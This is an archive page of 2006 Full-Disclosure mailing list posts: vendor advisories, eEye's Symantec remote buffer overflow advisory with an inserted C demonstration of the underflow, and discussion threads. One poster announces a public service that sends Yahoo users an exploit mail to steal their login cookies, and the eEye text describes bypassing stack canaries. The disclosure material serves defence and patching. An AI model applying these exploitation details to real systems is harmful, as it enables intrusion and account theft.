(which may include fonts embedded in documents such as PDF files)
to cause applications to crash, and may possibly also allow them
to execute arbitrary code as the user accessing the files.



Re: [Full-disclosure] Vulnerability in yahoo webmail.

2006-06-12 Thread n3td3v
Yahoo is under the control of hackers.

[Full-disclosure] [ MDKSA-2006:099 ] - Updated freetype2 packages fixes multiple vulnerabilities.

2006-06-12 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:099
 http://www.mandriva.com/security/
 ___
 
 Package : freetype2
 Date: June 12, 2006
 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 Integer underflow in Freetype before 2.2 allows remote attackers to cause 
 a denial of service (crash) via a font file with an odd number of blue 
 values, which causes the underflow when decrementing by 2 in a context 
 that assumes an even number of values. (CVE-2006-0747)
 
 Multiple integer overflows in FreeType before 2.2 allow remote attackers to 
 cause a denial of service (crash) and possibly execute arbitrary code via 
 attack vectors related to (1) bdf/bdflib.c, (2) sfnt/ttcmap.c, 
 (3) cff/cffgload.c, and (4) the read_lwfn function and a crafted LWFN file 
 in base/ftmac.c. (CVE-2006-1861)
 
 Ftutil.c in Freetype before 2.2 allows remote attackers to cause a denial 
 of service (crash) via a crafted font file that triggers a null dereference.
 (CVE-2006-2661)
 
 In addition, a patch is applied to 2.1.10 in Mandriva 2006 to fix a serious 
 bug in ttkern.c that caused some programs to go into an infinite loop when 
 dealing with fonts that don't have a properly sorted kerning sub-table. 
 This patch is not applicable to the earlier Mandriva releases.  
 
 Packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1861
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2661
 ___
 
 Updated Packages:
 

[Full-disclosure] [ GLSA 200606-14 ] GDM: Privilege escalation

2006-06-12 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200606-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: GDM: Privilege escalation
  Date: June 12, 2006
  Bugs: #135027
ID: 200606-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An authentication error in GDM could allow users to gain elevated
privileges.

Background
==========

GDM is the GNOME display manager.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  gnome-base/gdm           < 2.8.0.8                      >= 2.8.0.8

Description
===========

GDM allows a normal user to access the configuration manager.

Impact
======

When the face browser in GDM is enabled, a normal user can use the
"Configure Login Manager" option with his/her own password instead of
the root password, and thus gain additional privileges.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GDM users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=gnome-base/gdm-2.8.0.8"

References
==========

  [ 1 ] Gnome Bugzilla entry
        http://bugzilla.gnome.org/show_bug.cgi?id=343476
  [ 2 ] CVE-2006-2452
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2452

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200606-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] PassMark?

2006-06-12 Thread Gary E. Miller

Yo All!

I thought I'd actually risk a real security question here.

Any one seen the PassMark (www.passmarksecurity.com) security system
in action?

RGDS
GARY
- ---
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
[EMAIL PROTECTED]  Tel:+1(541)382-8588



[Full-disclosure] repeated port 21 attempts

2006-06-12 Thread Jacob Wu
I'm getting port 21 connection attempts every 5 minutes from about half a
dozen of my network users.  These attempts are repeating regularly with one
computer sending out 1500+ attempts a day.  I have not seen this before and
I'm wondering if anyone else here has seen a client behave this way before?

My initial thoughts were: hacker, virus/trojan/spyware or badly configured
program.  I ruled hacker out right away when talking to the clients and
realizing they didn't even understand the concept of ports.  After receiving
the machines from the clients and doing vigorous virus/trojan/spyware scans
I have found nothing known on them.

Anyone got anything?  Is this something new or just new to me?



Re: [Full-disclosure] repeated port 21 attempts

2006-06-12 Thread Rodrigo Barbosa

On Mon, Jun 12, 2006 at 04:30:40PM -0500, Jacob Wu wrote:
 I'm getting port 21 connection attempts every 5 minutes from about half a
 dozen of my network users.  These attempts are repeating regularly with one
 computer sending out 1500+ attempts a day.  I have not seen this before and
 I'm wondering if anyone else here has seen a client behave this way before?

What is the target address ?

- -- 
Rodrigo Barbosa
Quid quid Latine dictum sit, altum viditur
Be excellent to each other ... - Bill & Ted (Wyld Stallyns)



Re: [Full-disclosure] repeated port 21 attempts

2006-06-12 Thread Matt Venzke

Try websnarf:  http://www.unixwiz.net/tools/websnarf-1.04

Set the port to 21 & log some of the data they're sending.  You can
have it log the session to a file, too, I think.  Note that the one
line it grabs may not amount to much of anything, but it might give
you some idea what the machines are trying to do.

- Matt



[Full-disclosure] [EEYEB-20060524] Symantec Remote Management Stack Buffer Overflow

2006-06-12 Thread eEye Advisories
Symantec Remote Management Stack Buffer Overflow

Release Date:
June 12, 2006

Date Reported:
May 24, 2006

Severity:
High (Remote Code Execution)

Systems Affected:
Symantec AntiVirus 10.0.x for Windows (all versions)
Symantec AntiVirus 10.1.x for Windows (all versions)
Symantec Client Security 3.0.x for Windows (all versions)
Symantec Client Security 3.1.x for Windows (all versions)

Systems Not Affected:
Symantec AntiVirus 10.x.x for Macintosh
Symantec AntiVirus 10.x.x for Linux
Symantec AntiVirus 10.x.x for Wireless

Overview:
eEye Digital Security has discovered a vulnerability in the remote
management interface for Symantec AntiVirus 10.x and Symantec Client
Security 3.x, which could be exploited by an anonymous attacker in order
to execute arbitrary code with SYSTEM privileges on an affected system.
The management interface is typically enabled in enterprise settings and
listens on TCP port 2967 by default, for both server and client systems.

Although remote management traffic is typically SSL-encrypted, managed
systems will accept and process clear-text requests of the vulnerable
type.

Technical Details:
The remote management protocol communicated by the affected products is
a proprietary message-based protocol with two levels of encapsulation.
The outer layer comprises a message header indicating one of three
message types: 10, which designates a request to Rtvscan.exe, or 20 or
30, which mediate SSL negotiation.  If SSL is established for a TCP
connection, subsequent traffic is encrypted although the plaintext is
still in the proprietary format.

The data of type-10 messages contains its own header and body which are
processed by Rtvscan.exe.  This header features a command field which
specifies the operation to perform and dictates the format of the body
data.

The COM_FORWARD_LOG (0x24) command handler contains an improper use of
strncat that allows a 0x180-byte stack buffer to be overflowed with
arbitrary data.  If the first string in the COM_FORWARD_LOG request body
contains a backslash, then one of the following two strncat calls will
be performed:

 * If the string contains a comma but no double-quote:

strncat(dest, src, 0x17A - strlen(src));

 * Otherwise:

strncat(dest, src, 0x17C - strlen(src));

If the length of the source string exceeds 0x17A or 0x17C characters
respectively, the arithmetic will underflow and result in a very large
copy size (since the copy size argument is of type size_t, which is
unsigned).  This causes the entire source string to be appended to the
buffer, allowing the stack to be overwritten with up to 64KB of data in
which only null characters are prohibited.
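The size_t underflow described above, as an added example that is not eEye's or Symantec's code: bad_remaining reproduces the 0x17A - strlen(src) bound as arithmetic only, so the wrap can be observed without overflowing anything, and safe_append (an assumed helper) shows the bound derived from the destination's remaining capacity instead. DEST_SIZE is the advisory's 0x180-byte buffer; the "log:" prefix and the try_append driver are constructed for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stack buffer size named in the advisory (0x180 bytes); the limit
 * constant is the one from the comma-but-no-double-quote branch. */
#define DEST_SIZE  0x180
#define VULN_LIMIT 0x17A

/* The vulnerable bound, isolated as pure arithmetic: size_t is unsigned,
 * so once src_len exceeds VULN_LIMIT the subtraction wraps to a huge value
 * and strncat would be told it may copy the entire source string. */
size_t bad_remaining(size_t src_len)
{
    return (size_t)VULN_LIMIT - src_len;
}

/* Returns 1 when the bound has wrapped, i.e. when it no longer constrains
 * the copy. A sane bound can never exceed the destination size. */
int bound_wrapped(size_t src_len)
{
    return bad_remaining(src_len) > DEST_SIZE;
}

/* Hardened append (assumed helper, not Symantec's code): the limit comes
 * from what is actually left in dest, and an oversized source is refused
 * outright instead of truncated. Returns 0 on success, -1 on refusal. */
int safe_append(char *dest, size_t dest_size, const char *src)
{
    const char *nul = memchr(dest, '\0', dest_size);
    if (nul == NULL)                  /* dest not NUL-terminated: refuse */
        return -1;
    size_t used = (size_t)(nul - dest);
    size_t remaining = dest_size - used - 1;   /* keep room for the NUL */
    size_t src_len = strlen(src);
    if (src_len > remaining)
        return -1;
    memcpy(dest + used, src, src_len + 1);     /* copies the NUL too */
    return 0;
}

/* Constructed driver: appends src_len 'A's to a fresh "log:" buffer and
 * reports whether safe_append accepted it (0) or refused it (-1). */
int try_append(size_t src_len)
{
    char dest[DEST_SIZE] = "log:";
    char src[0x200];
    if (src_len >= sizeof(src))
        return -1;
    memset(src, 'A', src_len);
    src[src_len] = '\0';
    return safe_append(dest, sizeof(dest), src);
}

int main(void)
{
    /* Lengths straddling the advisory's limit and the real capacity. */
    size_t lens[] = { 0x100, 0x17A, 0x17B, 0x17C };
    for (size_t i = 0; i < sizeof(lens) / sizeof(lens[0]); i++) {
        printf("src_len=0x%zx  bad_remaining=0x%zx  wrapped=%d  "
               "safe_append=%d\n",
               lens[i], bad_remaining(lens[i]), bound_wrapped(lens[i]),
               try_append(lens[i]));
    }
    return 0;
}
```

With a 4-byte "log:" prefix the honest capacity is 0x17B characters, so safe_append accepts 0x17B and refuses 0x17C, exactly where the vulnerable bound has already wrapped to SIZE_MAX.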

Rtvscan.exe was compiled with the Visual Studio /GS security option
which institutes stack canary checks, but this security measure can be
bypassed by causing a very large overwrite and taking control of an
exception handler registration.

As a basic workaround against automated exploitation, the management
interface TCP port may be changed via the
HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\AgentIPPort
registry value in order to accomplish a very slight amount of
obfuscation.  Remote management should continue to function even if
the new port numbers are not homogeneous across an enterprise.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink - Endpoint Vulnerability Prevention - preemptively protects from
this vulnerability.

Vendor Status:
Symantec has released patches for the affected products.  For more
information, please consult Symantec security advisory SYM06-010:
http://www.symantec.com/avcenter/security/Content/2006.05.25.html

Note that the installation of one or more previous patches may be
required before the SYM06-010 patch can be applied.

This issue has been assigned CVE-2006-2630.

Credit:
Derek Soeder

Related Links:
Retina Network Security Scanner - Free Trial
(http://www.eeye.com/html/products/retina/index.html)
Blink Endpoint Vulnerability Prevention - Free Trial
(http://www.eeye.com/html/products/blink/index.html)

Greetings:
Symantec engineers, for very quickly producing a solid patch.  Family
and friends.  Anti-greets to copperhead snakes.

Copyright (c) 1998-2006 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express
consent of eEye.  If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice.  Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information.  In no event shall the author be liable for any direct or
indirect damages whatsoever arising out of or in connection with the use
or spread of this information.  Any use of this 

RE: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread Sean Crawford


-Original Message- On Behalf Of n3td3v
Sent: Tuesday, June 13, 2006 4:05 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vunerability in yahoo webmail.

Yahoo is under the control of hackers.

Good, Yahoo are a pathetic service anyway so it's no big deal, hey.
$0.02
Sean.



[Full-disclosure] Thanks for the feedback! GreenBorder License inside - with new options - valid to end of year

2006-06-12 Thread Bill Stout
Hello List,

Thank you all for the feedback I've received so far.  Some of the
feedback I'm receiving is that it might also serve as a malware analysis
tool if we improve logging messages.  

In thanks to the list, and in the hope more security experts will stress
test the software, here's an extended period license:

D34OOW2267INS22JFDSOICKCCOE22EDX 

This is valid until the end of the year.  This also adds a 'safe file'
option - right-click on any executable or questionable file to open it
in virtual space.  Note: Many but not all programs will run in virtual
space; support for Firefox, IM, and other networking programs is not
official and has not been fully QA'd.

Also, we've added more security by adding a firewall between virtual
space and local network ports.  The binary was updated late on Friday
(6/9), and is available from here:

http://www.greenborder.com/earlyaccess/ 

Bill Stout




[Full-disclosure] Winword crashes

2006-06-12 Thread putosoft softputo

I have no time to check it, so here are the details about the crash:

Open in a browser the following location:
http://ofertas.muchoviaje.com/viajes/ofertas/ofertapaquete.aspx?codigo=8491

Next, Select all (Ctrl+E) and try pasting it in Microsoft Word. It will
always crash with a failure in MS09!GetSeletedLbx.


Maybe something with the table's cells?



[Full-disclosure] ZoneEdit.com Forcing Pop-Unders on WebForward-Configured Domains

2006-06-12 Thread Jason Coombs

Problem:

DNS service ZoneEdit.com now owned by MyDomains.com has started forcing 
JavaScript pop-Unders onto users' browsers when the domain owner uses 
the ZoneEdit WebForward feature.



References:

www.zoneedit.com

www.mydomains.com/support.php

www.casalemedia.com/contact.html


Details:

Casale Media, Inc. is the Pop-Under Spammer responsible for paying My 
Domains cash money to distribute this crap to users. Example script 
shown below, embedded within the WebForward Cloaking frame.


<script language=JavaScript src="http://as.casalemedia.com/sd?s=65701&f=1">


Possible Resolutions:

Stop using ZoneEdit for backup/failover or primary DNS service.

Remove the economic incentive to lie, cheat and steal.

Prosecute the offenders and send them to prison.

Send/Fax your objections to ZoneEdit/MyDomains

Correspondence or payment by check may be sent to our office at:
ZoneEdit, Inc.
111 Broadway, 11th Floor
New York, NY 10006
Fax:+1 (847) 461-1893



RE: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread php0t
 Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a
 proper write-up, and encourage them to close the hole, that'd be
 wonderful.

Since yahoo isn't known for fixing bugs fast unless it's serious (and
even then), here's something i wrote up today.
The exploit is turned into a script-kiddish interface. Here's how it
works:
1) you enter your email and the target (@yahoo.com) email
2) an email with the exploit is sent to the target
3) when the target opens the mail for reading, cookies get stolen and
you get a notification on the address specified
4) further instructions on how to log in are on the site.

Tested on IExplore and Opera, works with both.

http://zmailhost.ath.cx/

(I'm taking it down when yahoo fixes it or people abuse it too much)

[EMAIL PROTECTED]



RE: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread php0t
For the record: 30 minutes after I posted this, onLoad got changed to
onfiltered - problem fixed by yahoo. :)



  

Re: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread Cardoso

Congratulations to the hackers running Yahoo!!



On Tue, 13 Jun 2006 03:07:56 +0200
php0t [EMAIL PROTECTED] wrote:


Allgemeinen Anschulterlaubnis
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
digital life: http://www.contraditorium.com personal site and blog:
http://www.carloscardoso.com



Re: [Full-disclosure] Winword crashes

2006-06-12 Thread hypermodest
Hello putosoft,

Tuesday, June 13, 2006, 12:56:56 AM, you wrote:

 I have no time to check it so there are details about the crash:

 Open in a browser the following location:
 http://ofertas.muchoviaje.com/viajes/ofertas/ofertapaquete.aspx?codigo=8491

 Next, Select all (Ctrl+E) and try pasting it in Microsoft Word. It will 
 always crash with a failure in MS09!GetSeletedLbx.

Word 2003 (11.6359.6360) SP1 is not crashing.


-- 
Best regards,
 hypermodest  mailto:[EMAIL PROTECTED]



Re: [Full-disclosure] PassMark?

2006-06-12 Thread Randal T. Rioux

Gary E. Miller wrote:
 Yo All!
 
 I thought I'd actually risk a real security question here.
 
 Any one seen the PassMark (www.passmarksecurity.com) security system
 in action?
 

Yes.

Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recent
financial client corp. of mine.

I'm not impressed with it.

Randy



Re: [Full-disclosure] PassMark?

2006-06-12 Thread Q-Ball
I would agree as well, having recently reviewed them with others in the
same field. Apart from relying on users to only enter their password if
they saw an image, the solution heavily relied on cookie usage. This works
fine for most people but a lot of corporate environments have persistent
cookie policies so this ends up being an annoyance and ineffective for
this segment of users. It also makes it susceptible to keystroke loggers
due to the ease of which the challenge can be generated. I'd also have
trouble justifying this as anything other than a 2 x 1-factor solution
and as such it may not meet FFIEC guidelines.

The bigger issue, as with any other web based authentication solutions,
is what does this protect you against and the answer these days is not
a lot.

Q-Ball

On 6/13/06, Randal T. Rioux [EMAIL PROTECTED] wrote:


Re: FW: [Full-disclosure] PassMark?

2006-06-12 Thread Josh L. Perrymon
I am not impressed with the PassMark solution. It would be trivial to
setup a script of rotating images that are used by the passmark widget..
then feed them back to the user and have a script post stating the image
that was on the screen when the user clicked submit..

Also feeding in any 2nd level password.. AND the next code that may
change in 60 seconds.. It would just require the attacker to perform some
parts of the attack manually rather than scripted.. I mean-- the more
hoops you have to jump through will make it harder to attack or replicate
from a phishing view.. but also making it much more cumbersome on users.

JP
PacketFocus

I have only spent a few minutes looking at the passmark demo.. so
disregard if I'm way off :)

-Original Message-
From: Q-Ball [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, 13 June 2006 2:28 PM
To: Randal T. Rioux
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] PassMark?



Re: [Full-disclosure] SSL VPNs and security

2006-06-12 Thread Q-Ball
SSL VPNs have their legitimate place as does IPSec. Personally, I'd
rather that travelling execs who need to log on from a public Internet
terminal don't have full IP connectivity into the network, but maybe
that's just me.

Q-Ball

On 6/10/06, Tim [EMAIL PROTECTED] wrote:
   That depends on whether the solution tries to solve single-sign-on
   problems as well. If the vendor is trying to handle SSO in such an
   environment, then they are probably using domain cookies. The
   problems are exactly the same as the ones Michal listed, plus some
   additional ones specific to domain cookies.

  Right, that does make it difficult. There's probably work arounds, but
  they may be browser-specific. Wildcard cookies, cookies set to other
  origins, or somehow setting document.domain back to the base domain
  after the initial page load might help, but some would probably present
  the same problem.

  The web was never designed for complex application development. At
  least, web standards aren't.

  Use a real VPN.

  cheers,
  tim

[Full-disclosure] [SECURITY] [DSA 1096-1] New webcalendar packages fix arbitrary code execution

2006-06-12 Thread Martin Schulze

- --
Debian Security Advisory DSA 1096-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
June 13th, 2006 http://www.debian.org/security/faq
- --

Package: webcalendar
Vulnerability  : uninitialised variable
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-2762

A vulnerability has been discovered in webcalendar, a PHP-based
multi-user calendar, that allows a remote attacker to execute
arbitrary PHP code when register_globals is turned on.

The old stable distribution (woody) does not contain a webcalendar package.

For the stable distribution (sarge) this problem has been fixed in
version 0.9.45-4sarge5.

For the unstable distribution (sid) this problem has been fixed in
version 1.0.4-1.

We recommend that you upgrade your webcalendar package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge5.dsc
  Size/MD5 checksum:  608 216c1f9f764169fa877f1717f37dd73a

http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge5.diff.gz
  Size/MD5 checksum:12569 3a996902a10791fe764548728885d812

http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45.orig.tar.gz
  Size/MD5 checksum:   612360 a6a66dc54cd293429b604fe6da7633a6

  Architecture independent components:


http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge5_all.deb
  Size/MD5 checksum:   629442 f918fe96d26d5cbfa99efe2b2e938d2f


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
